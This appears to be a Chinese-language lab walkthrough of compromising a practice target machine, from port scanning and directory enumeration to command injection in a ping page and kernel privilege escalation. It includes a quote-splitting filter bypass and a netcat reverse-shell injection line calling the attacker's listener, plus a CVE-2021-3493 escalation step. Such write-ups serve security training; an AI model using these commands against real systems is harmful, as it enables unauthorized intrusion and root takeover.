靶机ip:172.16.33.49
突破
端口扫描
sudo nmap -p- 172.16.33.49 --open
结果如下:
特定端口扫描
sudo nmap -p80 -sV -A 172.16.33.49
结果如下:
针对80端口
隐藏路径枚举:
dirsearch -u http://172.16.33.49
结果如下:
隐藏文件枚举:
dirsearch -u http://172.16.33.49 -f -e txt,php,html.pdf
结果如下:
进入http://172.16.33.49/superadmin.php,根据提示怀疑其有ping功能,输入127.0.0.1尝试,发现果然如此:
既然有ping功能,那么就可以怀疑其有命令注入漏洞,尝试输入指令进行测试并查看源码:
1 |cat superadmin.php
根据其中的php脚本,可知该页面进行了关键字屏蔽,考虑通过单引号来对该屏蔽进行绕过操作:
输入指令:
1|which n’'c
得到结果:
绕过成功,这个时候就可以考虑用nc进行反弹bash操作了,本地端做好监听,输入以下指令:
1|n’‘c 10.8.0.19 1234 | bash | n’'c 10.8.0.19 2345
反弹成功,突破完成。
提权
升级终端
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看版本号和内核号
uname -a
cat /etc/os*
如图所示,知道是18.04ubuntu+5.0.0内核:
使用CVE-2021-3493内核漏洞进行提权
通过python传输和wget将编译好的文件上传至目标机/tmp目录下,执行:
提权成功,打靶完成。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
